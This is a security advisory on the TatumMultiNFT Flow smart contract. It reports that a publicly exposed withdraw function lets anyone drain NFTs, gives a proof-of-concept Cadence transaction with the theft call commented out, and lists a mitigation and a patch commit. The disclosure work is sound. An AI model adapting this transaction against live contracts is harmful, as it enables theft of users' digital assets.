TatumMultiNFT contract

Details

// line 36
pub resource interface TatumMultiNftCollectionPublic {
        pub fun withdraw(withdrawID: UInt64): @NonFungibleToken.NFT

In line 156, the withdraw functionality is exposed in the TatumMultiNftCollectionPublic resource interface. Since the TatumMultiNftCollectionPublic interface is used to expose certain functions inside the Collection resource publicly, an attacker can steal all NFTs by borrowing the public capability situated under CollectionPublicPath and calling the withdraw function.

Pseudocode

Below is an example transaction code that illustrates the attack.

import TatumMultiNFT from 0x354e6721564ccd2c

transaction() {

    execute {
        let account = getAccount(0xac3ac01b20852170)

        let cap = account.getCapability<&{TatumMultiNFT.TatumMultiNftCollectionPublic}>(TatumMultiNFT.CollectionPublicPath).borrow()!

        let availableNFTs = cap.getIDs()

        for nft in availableNFTs {
            //  let res <- cap.withdraw(withdrawID: nft)
        }

    }
}

Mitigation

Consider removing the withdraw functionality in line 36.

Reference

Cadence Anti-Patterns

Patch commit

fix vulnerability · tatumio/flow-contracts@ebf2cdd

Transaction hash